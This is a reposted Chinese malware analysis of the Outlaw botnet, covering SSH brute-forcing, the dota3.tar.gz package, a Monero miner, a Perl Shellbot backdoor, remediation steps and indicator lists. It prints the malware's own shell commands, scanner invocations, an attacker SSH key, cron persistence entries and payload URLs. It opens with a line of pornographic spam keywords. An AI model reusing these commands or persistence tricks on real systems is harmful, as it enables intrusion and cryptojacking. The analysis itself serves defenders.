黄色网站入口国产美女,精品国产欧美另类一区,国产一区二区美女自慰,日日摸夜夜添无码国产

選擇你喜歡的標(biāo)簽
我們會(huì)為你匹配適合你的網(wǎng)址導(dǎo)航

    確認(rèn) 跳過(guò)

    跳過(guò)將刪除所有初始化信息

    kswapd0進(jìn)程過(guò)渡消耗CPU 亡命徒Outlaw漏洞修復(fù)

    安全 2021-12-23 19:08

    聲明:該文章來(lái)自(嘶吼RoarTalk)版權(quán)由原作者所有,K2OS渲染引擎提供網(wǎng)頁(yè)加速服務(wù)。

    一、背景

    騰訊安全威脅情報(bào)中心檢測(cè)到國(guó)內(nèi)大量企業(yè)遭遇亡命徒(Outlaw)僵尸網(wǎng)絡(luò)攻擊。亡命徒(Outlaw)僵尸網(wǎng)絡(luò)最早于 2018 年被發(fā)現(xiàn),其主要特征為通過(guò) SSH 爆破攻擊目標(biāo)系統(tǒng),同時(shí)傳播基于 Perl 的 Shellbot 和門(mén)羅幣挖礦木馬。騰訊安全威脅情報(bào)中心安全大數(shù)據(jù)顯示,亡命徒(Outlaw)僵尸網(wǎng)絡(luò)已造成國(guó)內(nèi)約 2 萬(wàn)臺(tái) Linux 服務(wù)器感染,影響上萬(wàn)家企業(yè)。

    此次攻擊傳播的母體文件為 dota3.tar.gz,可能為亡命徒(Outlaw)僵尸網(wǎng)絡(luò)的第 3 個(gè)版本,母體文件釋放 shell 腳本啟動(dòng)對(duì)應(yīng)二進(jìn)制程序,kswapd0 負(fù)責(zé)進(jìn)行門(mén)羅幣挖礦,tsm32、tsm64 負(fù)責(zé)繼續(xù) SSH 爆破攻擊傳播病毒。

    亡命徒(Outlaw)僵尸網(wǎng)絡(luò)之前通過(guò)利用 Shellshock 漏洞進(jìn)行分發(fā),因此被命名為 " Shellbot"。Shellbot 利用物聯(lián)網(wǎng)(IoT)設(shè)備和 Linux 服務(wù)器上的常見(jiàn)命令注入漏洞進(jìn)行感染。Shellshock 漏洞 ( CVE-2014-7169 ) 是 2014 年在 Bash command shell 中發(fā)現(xiàn)的一個(gè)嚴(yán)重的漏洞,大多數(shù) Linux 發(fā)行版通常會(huì)使用到該功能,攻擊者可以在這些受影響的 Linux 服務(wù)器上遠(yuǎn)程執(zhí)行代碼。

    二、樣本分析

    Outlaw 通過(guò) SSH 爆破攻擊,訪問(wèn)目標(biāo)系統(tǒng)并下載帶有 shell 腳本、挖礦木馬、后門(mén)木馬的 TAR 壓縮包文件 dota3.tar.gz。解壓后的文件目錄可以看到,根目錄 rsync 下存放初始化腳本,a 目錄下存放 shellbot 后門(mén),b 目錄下存放挖礦木馬,c 目錄下存放 SSH 爆破攻擊程序。

    C 目錄下二進(jìn)制文件 tsm32、tsm64 為 SSH(22 端口)掃描和爆破程序,并可以通過(guò)執(zhí)行遠(yuǎn)程命名來(lái)下載和執(zhí)行惡意程序。

    爆破成功后執(zhí)行 base64 編碼的 shell 命令,主要功能為刪除舊版本的惡意程序和目錄,然后解壓獲取到的最新版本惡意程序并執(zhí)行,內(nèi)容如下:

    命令 1:

    #!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X25-unix
cd .X25-unix
mv ar/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1&
sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm
exit 0

    命令 2:

    sleep 3s && cd /tmp/.X25-unix/.rsync/c
nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&

    還會(huì)通過(guò)遠(yuǎn)程命令修改 SSH 公鑰為:

    AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw==

    以便之后能更容易入侵。

    B 目錄下 run 腳本主要內(nèi)容為 base64 編碼的 shellbot 后門(mén)程序,解碼后可以看到代碼仍然經(jīng)過(guò)混淆。

    把執(zhí)行函數(shù) eval 改為 print 可打印出解密后的代碼,是基于 Perl 的 Shellbot 變種,連接 C2 服務(wù)器地址為 45.9.148.99:443,能夠執(zhí)行多個(gè)后門(mén)命令,包括文件下載、執(zhí)行 shell cmd 和 DDoS 攻擊。

    A 目錄下二進(jìn)制文件 kswapd0 為 XMRig 編譯的 Linux 平臺(tái)門(mén)羅幣挖礦木馬。

    在初始化階段會(huì)執(zhí)行腳本 init0 來(lái)找到大量 Linux 平臺(tái)競(jìng)品挖礦木馬并進(jìn)行清除。?

    在當(dāng)前用戶目錄下創(chuàng)建 /.configrc 目錄,拷貝 a、b 文件夾到該目錄下并執(zhí)行初始化腳本,然后通過(guò)寫(xiě)入 cron.d 安裝計(jì)劃任務(wù)進(jìn)行持久化。寫(xiě)入定時(shí)任務(wù)如下:

    1?1?*/2?*?*?$dir2/a/upd>/dev/null?2>&1
@reboot?$dir2/a/upd>/dev/null?2>&1
5?8?*?*?0?$dir2/b/sync>/dev/null?2>&1
@reboot?$dir2/b/sync>/dev/null?2>&1??
0?0?*/3?*?*?$dir/c/aptitude>/dev/null?2>&1

    三、安全建議

    建議企業(yè) Linux 服務(wù)器管理員檢查服務(wù)器資源占用情況,及時(shí)修改弱密碼,避免被暴力破解。若發(fā)現(xiàn)服務(wù)器已被入侵安裝挖礦木馬,可參考以下步驟手動(dòng)檢查、清除:

    1、?刪除以下文件,殺死對(duì)應(yīng)進(jìn)程:

    /tmp/*-unix/.rsync/a/kswapd0
*/.configrc/a/kswapd0
md5: 84945e9ea1950be3e870b798bd7c7559
/tmp/*-unix/.rsync/c/tsm64
md5: 4adb78770e06f8b257f77f555bf28065
/tmp/*-unix/.rsync/c/tsm32
md5: 10ea65f54f719bffcc0ae2cde450cb7a

    2、?檢查 cron.d 中是否存在包含以下內(nèi)容的定時(shí)任務(wù),如有進(jìn)行刪除:

    /a/upd
/b/sync
/c/aptitude

    IOCs

    IP

    45.9.148.99
45.55.57.6
188.166.58.29
104.236.228.46
165.227.45.249
192.241.211.94
188.166.6.130
142.93.34.237
46.101.33.198
149.202.162.73
167.71.155.236
157.245.83.8
45.55.129.23
46.101.113.206
37.139.0.226
159.203.69.48
104.131.189.116
159.203.102.122
159.203.17.176
91.121.51.120
128.199.178.188
208.68.39.124
45.55.210.248
206.81.10.104
5.230.65.21
138.197.230.249
107.170.204.148

    Md5

    dota3.tar.gz
1a4592f48f8d1bf77895862e877181e0
kswapd0
84945e9ea1950be3e870b798bd7c7559
tsm64
4adb78770e06f8b257f77f555bf28065
tsm32
10ea65f54f719bffcc0ae2cde450cb7a
run
716e6b533f836cee5e480a413a84645a

    URL

    http [ : ] //45.55.57.6/dota3.tar.gz
http [ : ] //188.166.58.29/dota3.tar.gz
http [ : ] //104.236.228.46/dota3.tar.gz
http [ : ] //165.227.45.249/dota3.tar.gz
http [ : ] //192.241.211.94/dota3.tar.gz
http [ : ] //188.166.6.130/dota3.tar.gz
http [ : ] //142.93.34.237/dota3.tar.gz
http [ : ] //46.101.33.198/dota3.tar.gz
http [ : ] //149.202.162.73/dota3.tar.gz
http [ : ] //167.71.155.236/dota3.tar.gz
http [ : ] //157.245.83.8/dota3.tar.gz
http [ : ] //45.55.129.23/dota3.tar.gz
http [ : ] //46.101.113.206/dota3.tar.gz
http [ : ] //37.139.0.226/dota3.tar.gz
http [ : ] //159.203.69.48/dota3.tar.gz
http [ : ] //104.131.189.116/dota3.tar.gz
http [ : ] //159.203.102.122/dota3.tar.gz
http [ : ] //159.203.17.176/dota3.tar.gz
http [ : ] //91.121.51.120/dota3.tar.gz
http [ : ] //128.199.178.188/dota3.tar.gz
http [ : ] //208.68.39.124/dota3.tar.gz
http [ : ] //45.55.210.248/dota3.tar.gz
http [ : ] //206.81.10.104/dota3.tar.gz
http [ : ] //5.230.65.21/dota3.tar.gz
http [ : ] //138.197.230.249/dota3.tar.gz
http [ : ] //107.170.204.148/dota3.tar.gz

    關(guān)注我們

    [超站]友情鏈接:

    四季很好,只要有你,文娛排行榜:https://www.yaopaiming.com/
    關(guān)注數(shù)據(jù)與安全,洞悉企業(yè)級(jí)服務(wù)市場(chǎng):https://www.ijiandao.com/

    *文章為作者獨(dú)立觀點(diǎn),不代表 0XUCN 立場(chǎng)
    本文由 柔柔by雀眠 發(fā)表,轉(zhuǎn)載此文章須經(jīng)作者同意,并請(qǐng)附上出處(0XUCN)及本頁(yè)鏈接。
    圖庫(kù)